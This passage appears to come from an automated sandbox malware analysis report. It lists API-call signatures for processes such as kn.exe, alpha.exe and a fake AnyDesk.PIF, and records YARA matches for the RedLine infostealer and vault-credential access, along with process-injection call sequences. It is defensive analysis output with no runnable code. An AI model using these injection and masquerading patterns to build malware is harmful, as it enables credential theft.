                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B198B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,12_2_00007FF627B198B0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,12_2_00007FF627AE342C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B193A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,12_2_00007FF627B193A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,12_2_00007FF627A7FC20
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,12_2_00007FF627A6F9B8

                      System Summary

                      Source: 27.2.Native_neworigin.exe.2fe0000.3.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 27.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 43.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 27.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 43.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: Trading_AIBot.exe.25.dr, cfRDgxIJtEfCD.cs Long String: Length: 17605
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe File dump: apihost.exe.28.dr 665670656
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,9_2_00007FF706EC7FF8
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,9_2_00007FF706EC8114
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EDBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,9_2_00007FF706EDBCF0
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,9_2_00007FF706EC88C0
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC89E4 NtQueryInformationToken,NtQueryInformationToken,9_2_00007FF706EC89E4
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,9_2_00007FF706EB3D94
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC898C NtQueryInformationToken,9_2_00007FF706EC898C
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EE1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,9_2_00007FF706EE1538
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,11_2_00007FF706EC7FF8
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_00007FF706EC8114
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EDBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_00007FF706EDBCF0
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_00007FF706EC88C0
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC89E4 NtQueryInformationToken,NtQueryInformationToken,11_2_00007FF706EC89E4
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,11_2_00007FF706EB3D94
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC898C NtQueryInformationToken,11_2_00007FF706EC898C
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EE1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_00007FF706EE1538
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B3C964 NtQuerySystemTime,RtlTimeToSecondsSince1970,12_2_00007FF627B3C964
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E08670 NtUnmapViewOfSection,15_2_02E08670
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E08400 NtReadVirtualMemory,15_2_02E08400
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E07A2C NtAllocateVirtualMemory,15_2_02E07A2C
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,15_2_02E0DC8C
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,15_2_02E0DC04
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E08D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,15_2_02E08D70
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,15_2_02E0DD70
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E07D78 NtWriteVirtualMemory,15_2_02E07D78
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E07A2A NtAllocateVirtualMemory,15_2_02E07A2A
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,15_2_02E0DBB0
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E08D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,15_2_02E08D6E
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,16_2_00007FF706EC7FF8
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,16_2_00007FF706EC8114
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EDBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,16_2_00007FF706EDBCF0
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,16_2_00007FF706EC88C0
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC89E4 NtQueryInformationToken,NtQueryInformationToken,16_2_00007FF706EC89E4
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,16_2_00007FF706EB3D94
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC898C NtQueryInformationToken,16_2_00007FF706EC898C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EE1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,16_2_00007FF706EE1538
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,17_2_00007FF706EC7FF8
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,17_2_00007FF706EC8114
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EDBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,17_2_00007FF706EDBCF0
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,17_2_00007FF706EC88C0
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC89E4 NtQueryInformationToken,NtQueryInformationToken,17_2_00007FF706EC89E4
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,17_2_00007FF706EB3D94
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC898C NtQueryInformationToken,17_2_00007FF706EC898C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EE1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,17_2_00007FF706EE1538
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF706EB5240
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC4224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,9_2_00007FF706EC4224
                      Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\8c4bfd40d4df6ab2.bin
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1387412_2_00007FF627B13874
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AAD7F012_2_00007FF627AAD7F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB77C812_2_00007FF627AB77C8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A817D412_2_00007FF627A817D4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6183012_2_00007FF627A61830
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF382012_2_00007FF627AF3820
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A5F80012_2_00007FF627A5F800
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC376012_2_00007FF627AC3760
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9979012_2_00007FF627A99790
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A5B78812_2_00007FF627A5B788
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACF6D812_2_00007FF627ACF6D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1D6DC12_2_00007FF627B1D6DC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2767812_2_00007FF627B27678
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6D66012_2_00007FF627A6D660
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A8564812_2_00007FF627A85648
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A976B012_2_00007FF627A976B0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2363812_2_00007FF627B23638
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AFD6A012_2_00007FF627AFD6A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1566012_2_00007FF627B15660
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF767812_2_00007FF627AF7678
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA55F012_2_00007FF627AA55F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A4F61012_2_00007FF627A4F610
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC95FC12_2_00007FF627AC95FC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7156C12_2_00007FF627A7156C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1958012_2_00007FF627B19580
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7B58C12_2_00007FF627A7B58C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABF52012_2_00007FF627ABF520
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B114F012_2_00007FF627B114F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AED46012_2_00007FF627AED460
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A4543812_2_00007FF627A45438
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B394A812_2_00007FF627B394A8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A8D44012_2_00007FF627A8D440
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A654A012_2_00007FF627A654A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF949412_2_00007FF627AF9494
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA747812_2_00007FF627AA7478
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A8F43412_2_00007FF627A8F434
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B333D012_2_00007FF627B333D0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B433D412_2_00007FF627B433D4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABD41012_2_00007FF627ABD410
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A473F812_2_00007FF627A473F8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6B36C12_2_00007FF627A6B36C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2B3AC12_2_00007FF627B2B3AC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7734012_2_00007FF627A77340
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB92D812_2_00007FF627AB92D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9D2C012_2_00007FF627A9D2C0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA92C412_2_00007FF627AA92C4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A4F2C012_2_00007FF627A4F2C0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD531812_2_00007FF627AD5318
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1D2B412_2_00007FF627B1D2B4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF529012_2_00007FF627AF5290
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A931E012_2_00007FF627A931E0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A911C812_2_00007FF627A911C8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A5D1B812_2_00007FF627A5D1B8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACF16812_2_00007FF627ACF168
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AAC0B812_2_00007FF627AAC0B8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1208412_2_00007FF627B12084
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7808012_2_00007FF627A78080
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA801812_2_00007FF627AA8018
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF9FF812_2_00007FF627AF9FF8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A41F8012_2_00007FF627A41F80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC9EE412_2_00007FF627AC9EE4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A91ED012_2_00007FF627A91ED0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD5F0412_2_00007FF627AD5F04
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACBE7012_2_00007FF627ACBE70
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACDEB012_2_00007FF627ACDEB0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9DEA412_2_00007FF627A9DEA4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A51DE812_2_00007FF627A51DE8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD1E2C12_2_00007FF627AD1E2C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A75DF712_2_00007FF627A75DF7
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA1D7012_2_00007FF627AA1D70
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF7D7012_2_00007FF627AF7D70
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B4DD8412_2_00007FF627B4DD84
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A99D6C12_2_00007FF627A99D6C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ADBDA012_2_00007FF627ADBDA0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9BCE812_2_00007FF627A9BCE8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A79CD012_2_00007FF627A79CD0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B09CC012_2_00007FF627B09CC0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7DD2012_2_00007FF627A7DD20
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A55D0812_2_00007FF627A55D08
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A93C6012_2_00007FF627A93C60
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B4FC9012_2_00007FF627B4FC90
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A5BCA412_2_00007FF627A5BCA4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC1C9012_2_00007FF627AC1C90
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AADBF012_2_00007FF627AADBF0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A69BC812_2_00007FF627A69BC8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9FC3412_2_00007FF627A9FC34
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7FC2012_2_00007FF627A7FC20
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF3C1012_2_00007FF627AF3C10
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD7B7412_2_00007FF627AD7B74
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AEFB5012_2_00007FF627AEFB50
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A45BA412_2_00007FF627A45BA4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB1B8412_2_00007FF627AB1B84
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A4FB8412_2_00007FF627A4FB84
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA7AC812_2_00007FF627AA7AC8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0BB2812_2_00007FF627B0BB28
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A91A6012_2_00007FF627A91A60
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF9A5812_2_00007FF627AF9A58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABBA4812_2_00007FF627ABBA48
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A73A4012_2_00007FF627A73A40
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A57AB412_2_00007FF627A57AB4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6F9B812_2_00007FF627A6F9B8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A41A1012_2_00007FF627A41A10
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B3793812_2_00007FF627B37938
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC19AC12_2_00007FF627AC19AC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B3994C12_2_00007FF627B3994C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACF99012_2_00007FF627ACF990
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DF20C415_2_02DF20C4
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB341016_2_00007FF706EB3410
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC37D816_2_00007FF706EC37D8
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC785416_2_00007FF706EC7854
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB8DF816_2_00007FF706EB8DF8
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC555416_2_00007FF706EC5554
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EBAA5416_2_00007FF706EBAA54
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB6BE016_2_00007FF706EB6BE0
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EDAFBC16_2_00007FF706EDAFBC
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB3F9016_2_00007FF706EB3F90
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB5B7016_2_00007FF706EB5B70
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB9B5016_2_00007FF706EB9B50
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB372C16_2_00007FF706EB372C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB851016_2_00007FF706EB8510
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EBB0D816_2_00007FF706EBB0D8
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC18D416_2_00007FF706EC18D4
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB188416_2_00007FF706EB1884
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EDAC4C16_2_00007FF706EDAC4C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB2C4816_2_00007FF706EB2C48
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EBCE1016_2_00007FF706EBCE10
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EDD9D016_2_00007FF706EDD9D0
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB81D416_2_00007FF706EB81D4
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EE153816_2_00007FF706EE1538
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB7D3016_2_00007FF706EB7D30
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706ED7F0016_2_00007FF706ED7F00
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB6EE416_2_00007FF706EB6EE4
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EDEE8816_2_00007FF706EDEE88
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EBE68016_2_00007FF706EBE680
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC0A6C16_2_00007FF706EC0A6C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EBD25016_2_00007FF706EBD250
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB9E5016_2_00007FF706EB9E50
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB765016_2_00007FF706EB7650
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB524016_2_00007FF706EB5240
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB4A3016_2_00007FF706EB4A30
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EDAA3016_2_00007FF706EDAA30
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB222016_2_00007FF706EB2220
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC422416_2_00007FF706EC4224
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB341017_2_00007FF706EB3410
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC37D817_2_00007FF706EC37D8
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC785417_2_00007FF706EC7854
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB8DF817_2_00007FF706EB8DF8
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC555417_2_00007FF706EC5554
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EBAA5417_2_00007FF706EBAA54
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB6BE017_2_00007FF706EB6BE0
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EDAFBC17_2_00007FF706EDAFBC
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB3F9017_2_00007FF706EB3F90
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB5B7017_2_00007FF706EB5B70
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB9B5017_2_00007FF706EB9B50
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB372C17_2_00007FF706EB372C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB851017_2_00007FF706EB8510
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EBB0D817_2_00007FF706EBB0D8
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC18D417_2_00007FF706EC18D4
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB188417_2_00007FF706EB1884
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EDAC4C17_2_00007FF706EDAC4C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB2C4817_2_00007FF706EB2C48
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EBCE1017_2_00007FF706EBCE10
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EDD9D017_2_00007FF706EDD9D0
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB81D417_2_00007FF706EB81D4
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EE153817_2_00007FF706EE1538
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB7D3017_2_00007FF706EB7D30
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706ED7F0017_2_00007FF706ED7F00
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB6EE417_2_00007FF706EB6EE4
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EDEE8817_2_00007FF706EDEE88
